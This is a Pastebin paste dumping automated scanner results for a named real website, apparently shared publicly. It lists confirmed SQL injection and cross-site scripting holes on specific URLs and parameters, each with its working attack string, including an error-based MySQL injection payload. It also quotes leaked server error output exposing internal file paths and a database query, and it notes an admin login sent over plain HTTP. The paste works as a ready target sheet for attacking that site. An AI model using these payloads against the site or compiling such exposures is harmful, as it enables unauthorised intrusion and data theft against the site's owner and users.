API tools faq
paste
Advertisement
sroub3k

dsw.cz

sroub3k
Sep 17th, 2011
385
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.45 KB | None | 0 0
raw download clone embed print report
  1. Tittle: Data Storage Workshop
  2. URL: http://www.dsw.cz
  3. Scanner: Netsparker
  4. Screen: http://img24.eu/v.php?file=3tyvpmxi.jpg (Vulnerability Chart)
  5.  
  6. |||
  7.  
  8. Boolean Based SQL Injection
  9.  
  10. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  11.  
  12. Severity : Critical
  13. Confirmation : Confirmed
  14. Detection Accuracy :
  15. Vulnerable URL : http://www.dsw.cz/reserve
  16. Parameter Name: type
  17. Parameter Type: Post
  18. Attack Pattern: -1 OR 17-7=10
  19.  
  20. |||
  21.  
  22. [High Possibility] SQL Injection
  23.  
  24. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  25.  
  26. Severity : Critical
  27. Confirmation : Confirmed
  28. Detection Accuracy :
  29. Vulnerable URL : http://www.dsw.cz/reserve
  30. Parameter Name: step
  31. Parameter Type: Post
  32. Attack Pattern: NSFTW
  33.  
  34. Severity : Critical
  35. Confirmation : Confirmed
  36. Detection Accuracy :
  37. Vulnerable URL : http://www.dsw.cz/reserve
  38. Parameter Name: type
  39. Parameter Type: Post
  40. Attack Pattern: %27
  41.  
  42. |||
  43.  
  44. SQL Injection
  45.  
  46. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  47.  
  48. Severity : Critical
  49. Confirmation : Confirmed
  50. Detection Accuracy :
  51. Vulnerable URL : http://www.dsw.cz/reserve
  52. Parameter Name: type
  53. Parameter Type: Post
  54. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  55.  
  56. |||
  57.  
  58. Cross-site Scripting
  59.  
  60. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  61.  
  62. Severity : Important
  63. Confirmation : Confirmed
  64. Detection Accuracy :
  65. Vulnerable URL : http://www.dsw.cz/reserve
  66. Parameter Name: type
  67. Parameter Type: Post
  68. Attack Pattern: '><script>alert(9)</script>
  69.  
  70. Severity : Important
  71. Confirmation : Confirmed
  72. Detection Accuracy :
  73. Vulnerable URL : http://www.dsw.cz/index.php?pg=><body onload=alert(9)>
  74. Parameter Name: pg
  75. Parameter Type: Querystring
  76. Attack Pattern: ><body onload=alert(9)>
  77.  
  78. |||
  79.  
  80. [Possible] Permanent Cross-site Scripting
  81.  
  82. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  83.  
  84. Severity : Important
  85. Confirmation : Confirmed
  86. Detection Accuracy :
  87. Vulnerable URL : http://www.dsw.cz/reserve
  88. Injection URL: http://www.dsw.cz/lang.inc.php?lang='%22%3E%3Cnet%20sparker=netsparker(0x0001DB)%3E
  89. Parameter Name: back
  90. Parameter Type: Post
  91. Attack Pattern: %27
  92. -
  93. Error message:
  94. <--
  95. Warning: include(./lang/lang-\'\"><net sparker=netsparker(0x0001DB)>.php) [function.include]: failed to open stream: No such file or directory in /data/www/virtuals/expo-net.cz/www/index.php on line 19
  96.  
  97. Warning: include() [function.include]: Failed opening './lang/lang-\'\"><net sparker=netsparker(0x0001DB)>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/php5:/data/www/htdocs/PEAR') in /data/www/virtuals/expo-net.cz/www/index.php on line 19
  98. .css" rel="stylesheet" type="text/css" media="all" />
  99. Expo-net.cz
  100. Chyba vyberu z databaze
  101. SQL dotaz:
  102. SELECT cl.nadpis, cl.text, cl.perex, cl.gid, cg.id_menu FROM clanky_global AS cg LEFT JOIN \'\">_clanky AS cl ON cg.gid = cl.gid WHERE cg.identifikator = 'clanek_kalendar_bottom' AND cl.aktivni = 1 AND (cg.alias REGEXP '([[.vertical-line.]]51[[.vertical-line.]]){1}') ORDER BY cg.razeni DESC, cl.ulozeno DESC
  103. Chybova hlaska:
  104. 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\">_clanky AS cl ON cg.gid = cl.gid ' at line 7
  105. -->
  106.  
  107. |||
  108.  
  109. Password Transmitted Over HTTP
  110.  
  111. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  112.  
  113. Severity : Important
  114. Confirmation : Confirmed
  115. Detection Accuracy :
  116. Vulnerable URL : http://www.dsw.cz/admin/index.php
  117. Form target action: index.php
  118.  
  119. |||
  120.  
  121. Robots.txt Identified
  122. http://www.dsw.cz/robots.txt
  123.  
  124. User-Agent: *
  125. Disallow: /admin/
  126. Disallow: /tisk/
  127. Disallow: /foto/
  128. Disallow: /files/
  129. Disallow: /kosik*
  130. Disallow: /index.php?pg=rezervace*
  131. Disallow: /index.php?pg=processdata*
  132.  
  133. |||
  134.  
  135. [Possible] Internal Path Leakage (*nix)
  136.  
  137. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
  138.  
  139. Severity : Information
  140. Confirmation : Confirmed
  141. Detection Accuracy :
  142. Vulnerable URL : http://www.dsw.cz/reserve
  143. Identified Internal Path(s): /usr/share/php:/usr/share/php5:/data/www/htdocs/PEAR
  144. Parameter Name: back
  145. Parameter Type: Post
  146. Attack Pattern: %27
  147.  
  148. |||
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!